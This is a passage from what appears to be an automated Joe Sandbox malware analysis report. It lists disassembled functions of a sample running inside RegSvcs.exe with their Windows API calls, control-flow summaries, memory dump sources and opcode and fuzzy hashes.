                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 3 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: 6EA
                                                                                            • API String ID: 1279760036-1400015478
                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 201 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a480 210->212 213 40838d 210->213 212->213 213->211
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                                                            • Instruction ID: 3ad5dae182a485ddbeb7f5a480a9d39f63c17b8903bd479f2bd62391de7c6076
                                                                                            • Opcode Fuzzy Hash: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                                                            • Instruction Fuzzy Hash: C601B531A8032976EB21A6519C42FFF772C9F40F55F04415EFE04BA1C1D6B8690547EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 216 408310-40831f 217 408328-40835a call 41ca00 call 40acf0 call 414e50 216->217 218 408323 call 41be60 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a480 225->227 228 40838d 225->228 227->228 228->226
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 231 40acf0-40ad19 call 41cc50 234 40ad1b-40ad1e 231->234 235 40ad1f-40ad2d call 41d070 231->235 238 40ad3d-40ad4e call 41b4a0 235->238 239 40ad2f-40ad3a call 41d2f0 235->239 244 40ad50-40ad64 LdrLoadDll 238->244 245 40ad67-40ad6a 238->245 239->238 244->245
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 258 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 261 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 267 41a6b0-41a6dc call 41af60 ExitProcess
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014E9140,000000FF,00000022,?,00000004,00000000,00000000), ref: 014F2C24
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 809a5c5f1316f5ca696e6c958fa47e76aa92c1c26595163ab673ae119676917c
                                                                                            • Instruction ID: 4540d13d4d0c05d6f88e8037061970199dd5d3f0be26752b31dfaf05d4b2c75a
                                                                                            • Opcode Fuzzy Hash: 809a5c5f1316f5ca696e6c958fa47e76aa92c1c26595163ab673ae119676917c
                                                                                            • Instruction Fuzzy Hash: E7B09B71D019C5C5DA12E7A44608F177940B7D0711F19C466D3030696F8778C1D1E275
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014B13C2,00000000,7D810F61,00000009,00000018,000000D4,-00000018,7D810F61), ref: 014F2B6A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9fd5eff8da39edb7cdc570f119ed70dd174739ff46e7915c2a42122f1513b7e6
                                                                                            • Instruction ID: 3d977b02c033fdd496f536e88c9592bc7cdb4f40cbb32fbd8bec6f5d353f3015
                                                                                            • Opcode Fuzzy Hash: 9fd5eff8da39edb7cdc570f119ed70dd174739ff46e7915c2a42122f1513b7e6
                                                                                            • Instruction Fuzzy Hash: 6990026160280043410671984414A16404AA7E0211B59C421E10149D4DC56589D16225
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014C0857,000000FF,014C055F,00000000,7D810F61,00001000,00000004,00000000,00000000,00000000), ref: 014F2BFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0dc71e967edd1b59037daabe009c62debe830c23881582b93300dbeaf1893073
                                                                                            • Instruction ID: 770c60fb024a703665910efa5cb4667a73b9a3455789c4993a03e24047f2942d
                                                                                            • Opcode Fuzzy Hash: 0dc71e967edd1b59037daabe009c62debe830c23881582b93300dbeaf1893073
                                                                                            • Instruction Fuzzy Hash: 9890023160180842D18171984404A4A0045A7D1311F99C415A0025A98DCA558B9977A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014EE308,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,00000008,?), ref: 014F2ADA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 889521370f8f4e692c6b00cbba25733dfebb39b737f82df9345d5ed0683db6f3
                                                                                            • Instruction ID: b82cf40219af77037f62a11e412aa8e34192ee5ebfc75363f10ba8ada2df228a
                                                                                            • Opcode Fuzzy Hash: 889521370f8f4e692c6b00cbba25733dfebb39b737f82df9345d5ed0683db6f3
                                                                                            • Instruction Fuzzy Hash: A5900225611800430106B59807049070086A7D5361359C421F1015994CD66189A15221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014D12BC,014D1427,000000FF,?,00000000,00000000,00000000,00000079,00000001,00800000,?,?,01481164,00000001,00000000,0000001D), ref: 014F2D1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 35a8bf2a8686ded7913e1e6c8849bcf31c362e1dcb0c58d4473c80c565fdde67
                                                                                            • Instruction ID: 0848207a0cf572abfc14a650ba87e834b28dca6d785cf466bf5d55eda2a72050
                                                                                            • Opcode Fuzzy Hash: 35a8bf2a8686ded7913e1e6c8849bcf31c362e1dcb0c58d4473c80c565fdde67
                                                                                            • Instruction Fuzzy Hash: FF90022961380042D18171985408A0A0045A7D1212F99D815A001599CCC95589A95321
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014E6918,000000FF,?,?,014CD528,015A6664,015A6664,C0000225,00000000,?,014CE5AE,?,?,00000000,?,?), ref: 014F2D3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6ecfd72dc5801bd679b2d7132a64ad9339a1a57dbf0f0530c178f984aa526ea7
                                                                                            • Instruction ID: 24dc2f96ec203673ee641e1f35c6eb0675f59c52e33e28cb5886b6d03ea3c671
                                                                                            • Opcode Fuzzy Hash: 6ecfd72dc5801bd679b2d7132a64ad9339a1a57dbf0f0530c178f984aa526ea7
                                                                                            • Instruction Fuzzy Hash: 8C90022170180043D14171985418A064045F7E1311F59D411E0414998CD95589965322
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014EE47B,00000000,FFD23940,?,?,00000000), ref: 014F2DDA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ae0fedd2e4e84722eed42206d302728060f346a5f043d78460607cfc5d5842b7
                                                                                            • Instruction ID: 10fbecab2ba737432e042b9a33bb5cb1c2757aeabe43d21294ea069c273aa422
                                                                                            • Opcode Fuzzy Hash: ae0fedd2e4e84722eed42206d302728060f346a5f043d78460607cfc5d5842b7
                                                                                            • Instruction Fuzzy Hash: C5900221642841925546B19844049074046B7E0251799C412A1414D94CC5669996D721
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014EA618,00000037,?,00000408,00000000,?,00000000,Threadpool!), ref: 014F2DFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ebd96cad7d876e827cf3d3156201ef1801eccc9179fcc119b58e8a3ed0db193d
                                                                                            • Instruction ID: 29a533a705252cf03705c4bfd28e396fc283f9f2868ec48b525b71b6c979d548
                                                                                            • Opcode Fuzzy Hash: ebd96cad7d876e827cf3d3156201ef1801eccc9179fcc119b58e8a3ed0db193d
                                                                                            • Instruction Fuzzy Hash: 0190023160180453D11271984504B070049A7D0251F99C812A042499CDD6968A92A221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014AFB34,000000FF,00000000,00000000,00000000,-00010000,00000000,00000000,00000000,?,014AF559,00000000,00004000,00000000,00000000,00000000), ref: 014F2C7A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5d069a01ebca24cb429f049d7905b71d22b5357332cbe8a1d5c3d157d724cc0d
                                                                                            • Instruction ID: 2f0bf10be758f64fdd76abde4a235edf02022ae2cc8f679ef5eb13e78d76443b
                                                                                            • Opcode Fuzzy Hash: 5d069a01ebca24cb429f049d7905b71d22b5357332cbe8a1d5c3d157d724cc0d
                                                                                            • Instruction Fuzzy Hash: E890023160188842D11171988404B4A0045A7D0311F5DC811A4424A9CDC6D589D17221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014D3999,000000FA,00000001,?,00000050,?,?), ref: 014F2CAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3e1d4771415f6588b40eadcf4cccbf196ec08020c99fff6468506eb6269655cc
                                                                                            • Instruction ID: b2524638cc029f14d6b0a10df1ca070e8d678933a61409ecc7d7bdff68852a50
                                                                                            • Opcode Fuzzy Hash: 3e1d4771415f6588b40eadcf4cccbf196ec08020c99fff6468506eb6269655cc
                                                                                            • Instruction Fuzzy Hash: 3290023160180442D10175D85408A460045A7E0311F59D411A5024999EC6A589D16231
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014DE6D9,01000000,0000000D,00000000,00000000,00000010,01000000,?,?,00100021,00000018,?,00000005,00000060,000014A5), ref: 014F2F3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f0bf3ece4f57f39ce35efb1a714096fa241d883e3750a0f262e2957eca1d3533
                                                                                            • Instruction ID: b4d451d1821c86ee627be70dd53068eb642dcab5f3021bbb552fab49826c4b4d
                                                                                            • Opcode Fuzzy Hash: f0bf3ece4f57f39ce35efb1a714096fa241d883e3750a0f262e2957eca1d3533
                                                                                            • Instruction Fuzzy Hash: E390026174180482D10171984414F060045E7E1311F59C415E1064998DC659CD926226
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014F17E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 014F2FEA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7387cb9d1a2f82791dbb09399784ebfe037f72b82bcf893dfc28f7c7b1ef457d
                                                                                            • Instruction ID: 7de400fc226f2ffbd76913ea0685519abfce274d9f9636fe12252db3cfc397bc
                                                                                            • Opcode Fuzzy Hash: 7387cb9d1a2f82791dbb09399784ebfe037f72b82bcf893dfc28f7c7b1ef457d
                                                                                            • Instruction Fuzzy Hash: 3D900221611C0082D20175A84C14F070045A7D0313F59C515A0154998CC95589A15621
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014C03D9,000000FF,?,00001000,00000001,?,?,?,00800001,00000000,-00000001,?,00800001,00002001,?,?), ref: 014F2F9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 14cf017aa4b3751fc759626b9ff325d9b064450e47954acb9bde9364b07e805b
                                                                                            • Instruction ID: 5748f2f2a4b028dba12adb792e3322a9dd7c907efda320d0c370c15da695f6e2
                                                                                            • Opcode Fuzzy Hash: 14cf017aa4b3751fc759626b9ff325d9b064450e47954acb9bde9364b07e805b
                                                                                            • Instruction Fuzzy Hash: F2900231601C0442D10171984814B0B0045A7D0312F59C411A1164999DC66589916671
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014F05E3,?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?), ref: 014F2FBA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7c3743fb3343330c1fb3ed3e51ab48ceac68adf128ad3e2ee0eb3e9ce144f88c
                                                                                            • Instruction ID: 9cf682f779a343683605a4eb31cb516e7728a3e0cc0b622166e57350ce669332
                                                                                            • Opcode Fuzzy Hash: 7c3743fb3343330c1fb3ed3e51ab48ceac68adf128ad3e2ee0eb3e9ce144f88c
                                                                                            • Instruction Fuzzy Hash: A1900221A0180082414171A88844D064045BBE1221759C521A0998994DC59989A55765
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(014E6EBC,?,00000000,00000001,00000010,?,?,?,000000FE,00000028,00000000,?), ref: 014F2EAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 60d9d9cc66d90afba6763109dd78303276eeac863d17e2a9f7d2fb6863cbff3e
                                                                                            • Instruction ID: 62bd9d969c855874343e63f5a01766b932a767e9e37a96afd1660431aa9ca531
                                                                                            • Opcode Fuzzy Hash: 60d9d9cc66d90afba6763109dd78303276eeac863d17e2a9f7d2fb6863cbff3e
                                                                                            • Instruction Fuzzy Hash: 2090027160180442D14171984404B460045A7D0311F59C411A5064998EC6998ED56765
                                                                                            Uniqueness

